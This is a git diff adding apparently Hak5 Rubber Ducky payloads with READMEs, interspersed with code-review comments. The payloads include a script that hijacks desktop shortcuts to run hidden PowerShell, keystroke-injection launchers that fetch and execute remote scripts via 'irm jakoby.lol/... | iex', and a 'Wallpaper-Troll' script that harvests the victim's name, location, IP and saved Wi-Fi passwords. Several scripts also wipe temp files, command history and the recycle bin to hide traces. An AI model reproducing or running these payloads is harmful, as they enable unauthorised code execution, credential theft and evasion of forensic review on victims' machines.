$info.TargetPath -Leaf } catch { 'n/a'} + $info.Link = try { Split-Path $info.LinkPath -Leaf } catch { 'n/a'} + $info.WindowStyle = $link.WindowStyle + $info.IconLocation = $link.IconLocation + + return $info + } + } +} + +#----------------------------------------------------------------------------------------------------------- + +function Set-Shortcut { + param( + [Parameter(ValueFromPipelineByPropertyName=$true)] + $LinkPath, + $IconLocation, + $Arguments, + $TargetPath + ) + begin { + $shell = New-Object -ComObject WScript.Shell + } + + process { + 
$link = $shell.CreateShortcut($LinkPath) + + $PSCmdlet.MyInvocation.BoundParameters.GetEnumerator() | + Where-Object { $_.key -ne 'LinkPath' } | + ForEach-Object { $link.$($_.key) = $_.value } + $link.Save() + } +} + +#----------------------------------------------------------------------------------------------------------- + +function hijack{ +$Link = $i.LinkPath +$Loc = $i.IconLocation +$TargetPath = $i.TargetPath +if($Loc.length -lt 4){$Loc = "$TargetPath$Loc"} +$Target = $i.Target +if(Test-Path -Path "$Link" -PathType Leaf){Set-Shortcut -LinkPath "$Link" -IconLocation "$Loc" -Arguments "-w h -NoP -NonI -Exec Bypass start-process '$TargetPath';$code" -TargetPath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"} +} + +#----------------------------------------------------------------------------------------------------------- + +Get-ChildItem –Path "$Env:USERPROFILE\Desktop" -Filter *.lnk |Foreach-Object {$i = Get-Shortcut $_.FullName;hijack $_.FullName} diff --git a/Payloads/Subscribe/README.md b/Payloads/Subscribe/README.md new file mode 100644 index 0000000..b8b3966 --- /dev/null +++ b/Payloads/Subscribe/README.md @@ -0,0 +1,111 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +
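Review bot: `if ($path -eq $null)` in Get-Shortcut puts `$null` on the right-hand side of the comparison; when `$path` holds an array (which is what `dir ... -Recurse` returns) `-eq` filters the array rather than testing for null, so the guard should read `if ($null -eq $path)`. PSScriptAnalyzer reports this as PSPossibleIncorrectComparisonWithNull. The same function uses the interactive alias `dir` three times where a script should spell out `Get-ChildItem` (PSAvoidUsingCmdletAliases), as the final pipeline at the bottom of the file already does.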
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Subscribe + +A script I put together to make your target subscribe to your YouTube channel. + +## Description + +This script is set to open your YouTube account in their browser where they will be prompted to subscribe to you. +SPOILER: They do. + +## Getting Started + +### Dependencies + +* Windows 10,11 +* Your target will have to be signed into their YouTube account + +

(back to top)

+ +### Executing program + +* Plug in your device +* 15 seconds later you have a new subscriber +* Your youtube url needs to be inside both double and single quotes " ' url ' " +``` +powershell -w h -NoP -Ep Bypass $channel="'youtube.com/iamjakoby'";irm jakoby.lol/wj4 | iex +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+ + Jsonnet + +
TikTok +
+
+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

diff --git a/Payloads/Subscribe/Subscribe.ps1 b/Payloads/Subscribe/Subscribe.ps1 new file mode 100644 index 0000000..a5c6c2f --- /dev/null +++ b/Payloads/Subscribe/Subscribe.ps1 
@@ -0,0 +1,38 @@ +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : Subscribe | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : General | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# tiktok.com/@i_am_jakoby # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# +.DESCRIPTION + This program is designed to get your target to subscribe to your YouTube channel. 
+#> +############################################################################################################################################# + +# Enter your YouTube channel URL here, ONLY if you are rehosting this script yourself + +# $channel = "https://www.youtube.com/iamjakoby" + +Add-Type -AssemblyName System.Windows.Forms +$o=New-Object -ComObject WScript.Shell +$url = -join($channel,"?sub_confirmation=1") +Start-Process "$url" +Start-Sleep -Seconds 5 +[System.Windows.Forms.SendKeys]::SendWait('{TAB}'*2) +[System.Windows.Forms.SendKeys]::SendWait('{ENTER}') +Start-Sleep -Seconds 1 +[System.Windows.Forms.SendKeys]::SendWait('%{F4}') diff --git a/Payloads/Subscribe/Subscribe.txt b/Payloads/Subscribe/Subscribe.txt new file mode 100644 index 0000000..4794e7a --- /dev/null +++ b/Payloads/Subscribe/Subscribe.txt @@ -0,0 +1,14 @@ +REM Title: Subscribe + +REM Author: I am Jakoby + +REM Description: This payload is meant to make your target subscribe to your YouTube channel + +REM Target: Windows 10, 11 + +REM Your youtube url needs to be inside both double and single quotes " ' url ' " + +GUI r +DELAY 500 +STRING powershell -w h -NoP -Ep Bypass $channel="'youtube.com/iamjakoby'";irm jakoby.lol/wj4 | iex +ENTER diff --git a/Payloads/WallPaper-URL/ReadMe.md b/Payloads/WallPaper-URL/ReadMe.md new file mode 100644 index 0000000..34a4c96 --- /dev/null +++ b/Payloads/WallPaper-URL/ReadMe.md @@ -0,0 +1,112 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +
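Review bot: `$o=New-Object -ComObject WScript.Shell` in Subscribe.ps1 is assigned and never read; every key press below goes through `[System.Windows.Forms.SendKeys]`, so the line is dead code and should be removed. Dropping it also avoids creating a COM object for no purpose.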
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Wallpaper-URL + +This payload will download an image from any URL and set it as the target's wallpaper. + +## Description + +Use this program to troll your friends. Find any image online and grab the URL and insert it into the PS1 script. +Run this payload and step away. Once a mouse movement is detected, their wallpaper will change right in front of their eyes. +Lastly, to clean up your tracks behind you, the tmp folder will be emptied and the PowerShell and run box history will be wiped. + + +## Getting Started + +### Dependencies + +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +* Place your images URL in the $url variable +``` +powershell -w h -NoP -NonI -Exec Bypass $url='URL-HERE';irm jakoby.lol/pkw | iex +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+ + Jsonnet + +
TikTok +
+
+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

diff --git a/Payloads/WallPaper-URL/Wallpaper-URL.ps1 b/Payloads/WallPaper-URL/Wallpaper-URL.ps1 new file mode 100644 index 0000000..c287a83 --- /dev/null +++ b/Payloads/WallPaper-URL/Wallpaper-URL.ps1 
@@ -0,0 +1,103 @@ +# URL is for if you want to host your own copy of this payload + +#$url = "" + + +$wp = "$Env:tmp\---wp.png" + +iwr $url -O $wp + +Function Set-WallPaper { + +param ( + [parameter(Mandatory=$True)] + # Provide path to image + [string]$Image, + # Provide wallpaper style that you would like applied + [parameter(Mandatory=$False)] + [ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')] + [string]$Style +) + +$WallpaperStyle = Switch ($Style) { + + "Fill" {"10"} + "Fit" {"6"} + "Stretch" {"2"} + "Tile" {"0"} + "Center" {"0"} + "Span" {"22"} + +} + +If($Style -eq "Tile") { + + New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force + New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force + +} +Else { + + New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force + New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force + +} + +Add-Type -TypeDefinition @" +using System; +using System.Runtime.InteropServices; + +public class Params +{ + [DllImport("User32.dll",CharSet=CharSet.Unicode)] + public static extern int SystemParametersInfo (Int32 uAction, + Int32 uParam, + String lpvParam, + Int32 fuWinIni); +} +"@ + + $SPI_SETDESKWALLPAPER = 0x0014 + $UpdateIniFile = 0x01 + $SendChangeEvent = 0x02 + + $fWinIni = $UpdateIniFile -bor $SendChangeEvent + + $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni) +} + +function Target-Comes { +Add-Type -AssemblyName System.Windows.Forms +$originalPOS = [System.Windows.Forms.Cursor]::Position.X +$o=New-Object -ComObject WScript.Shell + + while (1) { + $pauseTime = 3 + if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ + break + } + else { + $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime + } + } +} + +function Clean-Exfil 
{ + +# empty temp folder +rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue + +# delete run box history +reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f + +# Delete powershell history +Remove-Item (Get-PSreadlineOption).HistorySavePath + +# Empty recycle bin +Clear-RecycleBin -Force -ErrorAction SilentlyContinue + +} + +Target-Comes +Set-WallPaper -Image $wp -Style Fill +Clean-Exfil diff --git a/Payloads/WallPaper-URL/Wallpaper-URL.txt b/Payloads/WallPaper-URL/Wallpaper-URL.txt new file mode 100644 index 0000000..4baa526 --- /dev/null +++ b/Payloads/WallPaper-URL/Wallpaper-URL.txt @@ -0,0 +1,16 @@ +REM Title: Wallpaper-Troll +REM +REM Author: I am Jakoby +REM +REM Description: This payload will change your targets wallpaper to an image from a provided url +REM Target: Windows 10, 11 +REM +REM -------------------------------------------------------------------------------------- +REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW. +REM -------------------------------------------------------------------------------------- +REM +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -Exec Bypass $url='URL-HERE';irm jakoby.lol/pkw | iex +DELAY 500 +ENTER diff --git a/Payloads/Wallpaper-Troll/README.md b/Payloads/Wallpaper-Troll/README.md new file mode 100644 index 0000000..0d21efa --- /dev/null +++ b/Payloads/Wallpaper-Troll/README.md @@ -0,0 +1,110 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +
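Review bot: In Set-WallPaper the return value of `SystemParametersInfo` is stored in `$ret` and never inspected, so a failed call is silent; either check it (`if ($ret -eq 0) { Write-Error 'SystemParametersInfo failed' }`) or do not assign it at all. The `Switch ($Style)` block has no default arm even though `$Style` is declared `Mandatory=$False`, so calling the function without `-Style` writes an empty `WallpaperStyle` string to the registry; a `Default { "10" }` arm or making the parameter mandatory would close that gap. `Target-Comes` and `Clean-Exfil` also use verbs outside PowerShell's approved verb list (PSUseApprovedVerbs).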
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Wallpaper-Troll + +A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes. + +## Description + +This program enumerates a target PC to get their Name, GeoLocation (Latitude and Longitude), Public IP, Day password was last set, and wifi passwords. This information will be saved to a file that is then converted to a .BMP image. That image will be saved to their desktop and saved as their wallpaper. Opening the image on their desktop with NotePad will reveal the binary code with a hidden message at the bottom of the file. + +![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/RubberDucky/Payloads/RD-Wallpaper-Troll/wp-troll.jpg) + +## Getting Started + +### Dependencies + +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-RestMethod will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/b8n | iex +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+ + Jsonnet + +
TikTok +
+
+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

diff --git a/Payloads/Wallpaper-Troll/Wallpaper-Troll.ps1 b/Payloads/Wallpaper-Troll/Wallpaper-Troll.ps1 new file mode 100644 index 0000000..186e44d --- /dev/null +++ b/Payloads/Wallpaper-Troll/Wallpaper-Troll.ps1 
@@ -0,0 +1,432 @@ +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : Wallpaper-Troll | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# tiktok.com/@i_am_jakoby # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# + +.DESCRIPTION + This program gathers details from target PC to include name associated with the microsoft account, their latitude and longitude, + Public IP, the SSID, and WiFi password of any current or previously connected to networks. + It will take the gathered information and generate a .jpg with that information on show. + Finally that .jpg will be applied as their Desktop Wallpaper so they know they were owned. 
+ Additionally, a secret message will be left in the binary of the wallpaper image generated and left on their desktop. +#> +############################################################################################################################################# + +# this is the message that will be coded into the image you use as the wallpaper + +$hiddenMessage = "`n`nMy crime is that of curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back `n with love -Jakoby" + +# this will be the name of the image you use as the wallpaper + +$ImageName = "dont-be-suspicious" + +############################################################################################################################################# + +<# + +.NOTES + This will get the name associated with the microsoft account +#> + + function Get-Name { + + try { + + $fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name") + + } + + # If no name is detected function will return $null to avoid sapi speak + + # Write Error is just for troubleshooting + catch {Write-Error "No name was detected" + return $env:UserName + -ErrorAction SilentlyContinue + } + + return $fullName + +} + +$fn = Get-Name + +echo "Hey" $fn >> $Env:temp\foo.txt + +echo "`nYour computer is not very secure" >> $Env:temp\foo.txt + +############################################################################################################################################# + +<# + +.NOTES + This is to get the current Latitude and Longitude of your target +#> + +function Get-GeoLocation{ + try { + Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace + $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object + $GeoWatcher.Start() #Begin resolving current location + + while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) { + Start-Sleep 
-Milliseconds 100 #Wait for discovery. + } + + if ($GeoWatcher.Permission -eq 'Denied'){ + Write-Error 'Access Denied for Location Information' + } else { + $GL = $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevant results. + if ($GL) { echo "`nYour Location: `n$GL" >> $Env:temp\foo.txt } + } + } + # Write Error is just for troubleshooting + catch {Write-Error "No coordinates found" + return "No Coordinates found" + -ErrorAction SilentlyContinue + } + +} + +Get-GeoLocation +#if ($GL) { echo "`nYour Location: `n$GL" >> $Env:temp\foo.txt } + + +############################################################################################################################################# + +<# + +.NOTES + This will get the public IP from the target computer +#> + + +function Get-PubIP { + + try { + + $computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content + + } + + # If no Public IP is detected function will return $null to avoid sapi speak + + # Write Error is just for troubleshooting + catch {Write-Error "No Public IP was detected" + return $null + -ErrorAction SilentlyContinue + } + + return $computerPubIP +} + +$PubIP = Get-PubIP +if ($PubIP) { echo "`nYour Public IP: $PubIP" >> $Env:temp\foo.txt } + + +########################################################################################################### + +<# + +.NOTES + Password last Set + This function will custom tailor a response based on how long it has been since they last changed their password +#> + + + function Get-Days_Set { + + #-----VARIABLES-----# + # $pls (password last set) = the date/time their password was last changed + # $days = the number of days since their password was last changed + + try { + + $pls = net user $env:USERNAME | Select-String -Pattern "Password last" ; $pls = [string]$pls + $plsPOS = $pls.IndexOf("e") + $pls = $pls.Substring($plsPOS+2).Trim() + $pls = $pls -replace ".{3}$" + $time = ((get-date) - (get-date "$pls")) ; $time = 
[string]$time + $DateArray =$time.Split(".") + $days = [int]$DateArray[0] + return $pls + + } + + # If no password set date is detected function will return $null to cancel Sapi Speak + + # Write Error is just for troubleshooting + catch {Write-Error "Day password set not found" + return $null + -ErrorAction SilentlyContinue + } +} + +$pls = Get-Days_Set +if ($pls) { echo "`nPassword Last Set: $pls" >> $Env:temp\foo.txt } + + +########################################################################################################### + +<# + +.NOTES + All Wifi Networks and Passwords + This function will gather all current Networks and Passwords saved on the target computer + They will be save in the temp directory to a file named with "$env:USERNAME-$(get-date -f yyyy-MM-dd)_WiFi-PWD.txt" +#> + + +# Get Network Interfaces +$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress + +# Get Wifi SSIDs and Passwords +$WLANProfileNames =@() + +#Get all the WLAN profile names +$Output = netsh.exe wlan show profiles | Select-String -pattern " : " + +#Trim the output to receive only the name +Foreach($WLANProfileName in $Output){ + $WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim() +} +$WLANProfileObjects =@() + +#Bind the WLAN profile names and also the password to a custom object +Foreach($WLANProfileName in $WLANProfileNames){ + + #get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user + try{ + $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim() + }Catch{ + $WLANProfilePassword = "The password is not stored in this profile" + } + + #Build the object and add this to an array + $WLANProfileObject = 
New-Object PSCustomobject + $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName + $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword + $WLANProfileObjects += $WLANProfileObject + Remove-Variable WLANProfileObject +} + if (!$WLANProfileObjects) { Write-Host "variable is null" + }else { + + # This is the name of the file the networks and passwords are saved to and later uploaded to the DropBox Cloud Storage + + echo "`nW-Lan profiles: ===============================" $WLANProfileObjects >> $Env:temp\foo.txt + +$content = [IO.File]::ReadAllText("$Env:temp\foo.txt") + } +############################################################################################################################################# + +<# + +.NOTES + This will get the dimension of the targets screen to make the wallpaper +#> + +Add-Type @" +using System; +using System.Runtime.InteropServices; +public class PInvoke { + [DllImport("user32.dll")] public static extern IntPtr GetDC(IntPtr hwnd); + [DllImport("gdi32.dll")] public static extern int GetDeviceCaps(IntPtr hdc, int nIndex); +} +"@ +$hdc = [PInvoke]::GetDC([IntPtr]::Zero) +$w = [PInvoke]::GetDeviceCaps($hdc, 118) # width +$h = [PInvoke]::GetDeviceCaps($hdc, 117) # height + +############################################################################################################################################# + +<# + +.NOTES + This will get take the information gathered and format it into a .jpg +#> + +Add-Type -AssemblyName System.Drawing + +$filename = "$env:tmp\foo.jpg" +$bmp = new-object System.Drawing.Bitmap $w,$h +$font = new-object System.Drawing.Font Consolas,18 +$brushBg = [System.Drawing.Brushes]::White +$brushFg = [System.Drawing.Brushes]::Black +$graphics = [System.Drawing.Graphics]::FromImage($bmp) +$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height) +$graphics.DrawString($content,$font,$brushFg,500,100) 
+$graphics.Dispose() +$bmp.Save($filename) + +# Invoke-Item $filename + +############################################################################################################################################# + +<# + +.NOTES + This will take your hidden message and use steganography to hide it in the image you use as the wallpaper + Then it will clean up the files you don't want to leave behind +#> + +echo $hiddenMessage > $Env:temp\foo.txt +cmd.exe /c copy /b "$Env:temp\foo.jpg" + "$Env:temp\foo.txt" "$Env:USERPROFILE\Desktop\$ImageName.jpg" + +rm $env:TEMP\foo.txt,$env:TEMP\foo.jpg -r -Force -ErrorAction SilentlyContinue + + +############################################################################################################################################# + +<# + +.NOTES + This will take the image you generated and set it as the targets wall paper +#> + +Function Set-WallPaper { + +<# + + .SYNOPSIS + Applies a specified wallpaper to the current user's desktop + + .PARAMETER Image + Provide the exact path to the image + + .PARAMETER Style + Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span) + + .EXAMPLE + Set-WallPaper -Image "C:\Wallpaper\Default.jpg" + Set-WallPaper -Image "C:\Wallpaper\Background.jpg" -Style Fit + +#> + + +param ( + [parameter(Mandatory=$True)] + # Provide path to image + [string]$Image, + # Provide wallpaper style that you would like applied + [parameter(Mandatory=$False)] + [ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')] + [string]$Style +) + +$WallpaperStyle = Switch ($Style) { + + "Fill" {"10"} + "Fit" {"6"} + "Stretch" {"2"} + "Tile" {"0"} + "Center" {"0"} + "Span" {"22"} + +} + +If($Style -eq "Tile") { + + New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force + New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force + +} +Else { + + New-ItemProperty -Path 
"HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force + New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force + +} + +Add-Type -TypeDefinition @" +using System; +using System.Runtime.InteropServices; + +public class Params +{ + [DllImport("User32.dll",CharSet=CharSet.Unicode)] + public static extern int SystemParametersInfo (Int32 uAction, + Int32 uParam, + String lpvParam, + Int32 fuWinIni); +} +"@ + + $SPI_SETDESKWALLPAPER = 0x0014 + $UpdateIniFile = 0x01 + $SendChangeEvent = 0x02 + + $fWinIni = $UpdateIniFile -bor $SendChangeEvent + + $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni) +} + +#---------------------------------------------------------------------------------------------------- + +function clean-exfil { + +<# + +.NOTES + This is to clean up behind you and remove any evidence to prove you were there +#> + +# Delete contents of Temp folder + +rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue + +# Delete run box history + +reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f + +# Delete powershell history + +Remove-Item (Get-PSreadlineOption).HistorySavePath + +# Deletes contents of recycle bin + +Clear-RecycleBin -Force -ErrorAction SilentlyContinue + +} + +#---------------------------------------------------------------------------------------------------- + +function Target-Comes { +Add-Type -AssemblyName System.Windows.Forms +$originalPOS = [System.Windows.Forms.Cursor]::Position.X +$o=New-Object -ComObject WScript.Shell + + while (1) { + $pauseTime = 3 + if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ + break + } + else { + $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime + } + } +} + +#---------------------------------------------------------------------------------------------------- + +Target-Comes + +Set-WallPaper -Image 
"$Env:USERPROFILE\Desktop\$ImageName.jpg" -Style Center
+
+clean-exfil
+
diff --git a/Payloads/Wallpaper-Troll/Wallpaper-Troll.txt b/Payloads/Wallpaper-Troll/Wallpaper-Troll.txt
new file mode 100644
index 0000000..681db45
--- /dev/null
+++ b/Payloads/Wallpaper-Troll/Wallpaper-Troll.txt
@@ -0,0 +1,20 @@
+REM Title: Wallpaper-Troll
+REM
+REM Author: I am Jakoby
+REM
+REM Description: This payload is meant to taunt your target with a revealing wallpaper. See README.md for more details.
+REM
+REM Target: Windows 10, 11
+REM
+REM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload.
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
+REM
+REM --------------------------------------------------------------------------------------
+REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
+REM --------------------------------------------------------------------------------------
+REM
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/b8n | iex
+DELAY 500
+ENTER
diff --git a/Payloads/Wallpaper-Troll/wp-troll.jpg b/Payloads/Wallpaper-Troll/wp-troll.jpg
new file mode 100644
index 0000000..f6263bc
Binary files /dev/null and b/Payloads/Wallpaper-Troll/wp-troll.jpg differ
diff --git a/Payloads/We-Found-You/README.md b/Payloads/We-Found-You/README.md
new file mode 100644
index 0000000..010b557
--- /dev/null
+++ b/Payloads/We-Found-You/README.md
@@ -0,0 +1,114 @@
+![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
+
+
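Review bot: `clean-exfil` removes everything under `$env:TEMP`, the RunMRU key and the PSReadLine history file of whichever account runs the script, with no guard and no statement of that scope, so executing this file to try it out wipes unrelated temp data and shell history on the tester's own machine; the function's `.NOTES` block should say so, e.g. `# WARNING: deletes ALL of %TEMP% and the PSReadLine history file, not only this script's own files`. The image saved to the desktop also carries the recovered Wi-Fi keys in cleartext, since `$content` (the whole of `foo.txt`, including the W-Lan profile dump) is rendered into `foo.jpg` by `DrawString`, so the artefact the payload leaves behind is itself a secret-bearing file readable by anyone who opens it, which the description above the code does not mention. `$content` is only assigned inside the `else` branch of the `$WLANProfileObjects` check, so the wallpaper's text source depends on a branch the surrounding comments do not describe; a one-line comment at the `Add-Type -AssemblyName System.Drawing` step naming where `$content` comes from would help a reader.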
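Review bot: The two REM lines about replacing a download link and changing `?dl=0` to `?dl=1` do not apply to this launcher, whose STRING line fetches `jakoby.lol/b8n` rather than a share link, and they sit directly above a banner that says no modifications are needed; drop them or reword them to match the file. The same stale pair closes `Payloads/YT-Tripwire/YouTube-TripWire.txt` after `ENTER`, where the `?dl=1` advice likewise has nothing to act on. `Remeber` is also misspelled.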
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# We-Found-You + +This script is ready to run as is. Just download and execute with the provided link. + +## Description + +This script will get the GeoLocation (Latitude and Longitude) of your target. +Then a page will open in their browser with a map of their current location on it. +Their system volume will be turned to max level. +SAPI speak with talk through their speakers the message provided or a custom one you provide. + +![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/RubberDucky/Payloads/RD-We-Found-You/location.jpg) + +## Getting Started + +### Dependencies + +* Windows 10,11 +* Their location services are turned on + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/yzb | iex +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+ + Jsonnet + +
TikTok +
+
+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

